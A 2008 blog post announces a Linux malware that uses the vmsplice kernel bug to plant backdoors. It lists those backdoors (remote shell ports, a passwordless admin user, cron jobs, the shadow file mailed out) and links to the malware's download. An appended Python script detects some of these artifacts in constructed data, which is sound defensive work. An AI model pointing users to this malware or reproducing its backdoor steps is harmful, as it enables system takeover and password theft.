Tuesday, February 19, 2008

SARA Linux Malware

Hi all!
Today I released a basic piece of malware that exploits the vmsplice bug in the Linux kernel.
This program uses the vulnerability to install some backdoors on the system.

UPDATED
Actions:
- disable INPUT rules on the firewall
- open port 1407 to execute remote commands
- open a bash session on port 14071 using the xinetd daemon
- add an admin user without a password
- schedule malicious tasks in cron
- mail the shadow file to a mail account

Vulnerable systems: Linux 2.6.17 - 2.6.24.1

Warning:
THIS IS MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.

Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz
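
A defender-side check for three of the artifacts listed under Actions, as an added example that is not part of the original post or the SARA package: it looks for empty-password accounts in shadow-format text, listeners on ports 1407 and 14071 in /proc/net/tcp-format text, and xinetd services whose server is a shell. The sample inputs, the account name `support` and the service name `example` are constructed; the post does not name them.

```python
import re

SARA_PORTS = {1407, 14071}  # listener ports named in the post

def empty_password_accounts(shadow_text):
    """Accounts whose shadow password field is empty (no password needed)."""
    rows = (line.split(":") for line in shadow_text.splitlines())
    return [f[0] for f in rows if len(f) >= 2 and f[0] and f[1] == ""]

def listening_sara_ports(proc_net_tcp):
    """/proc/net/tcp: column 2 is hexIP:hexPORT, column 4 '0A' means LISTEN."""
    found = set()
    for line in proc_net_tcp.splitlines():
        cols = line.split()
        if len(cols) >= 4 and cols[3] == "0A":
            port = int(cols[1].rsplit(":", 1)[1], 16)
            if port in SARA_PORTS:
                found.add(port)
    return sorted(found)

def xinetd_shell_services(conf_text):
    """xinetd service blocks whose 'server' is a shell binary."""
    hits = []
    for name, body in re.findall(r"service\s+(\S+)\s*\{(.*?)\}", conf_text, re.S):
        m = re.search(r"^\s*server\s*=\s*(\S+)", body, re.M)
        if m and re.search(r"/(ba|da|z|k|c)?sh$", m.group(1)):
            hits.append((name, m.group(1)))
    return hits

# Constructed sample data (not taken from the malware or from a real host).
SHADOW = "root:$1$salt$hash:13928:0:99999:7:::\nsupport::13928:0:99999:7:::\n"
PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue
   0: 00000000:0016 00000000:0000 0A 00000000:00000000
   1: 00000000:057F 00000000:0000 0A 00000000:00000000
   2: 00000000:36F7 00000000:0000 0A 00000000:00000000
   3: 0100007F:1F90 0100007F:057F 01 00000000:00000000
"""
XINETD = """\
service example
{
    socket_type = stream
    user        = root
    server      = /bin/bash
}
"""

if __name__ == "__main__":
    print("empty-password accounts:", empty_password_accounts(SHADOW))
    print("SARA ports listening:   ", listening_sara_ports(PROC_NET_TCP))
    print("xinetd shell services:  ", xinetd_shell_services(XINETD))
```

On a live host the three functions take the contents of `/etc/shadow`, `/proc/net/tcp` and the files under `/etc/xinetd.d/` in place of the constructed strings.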
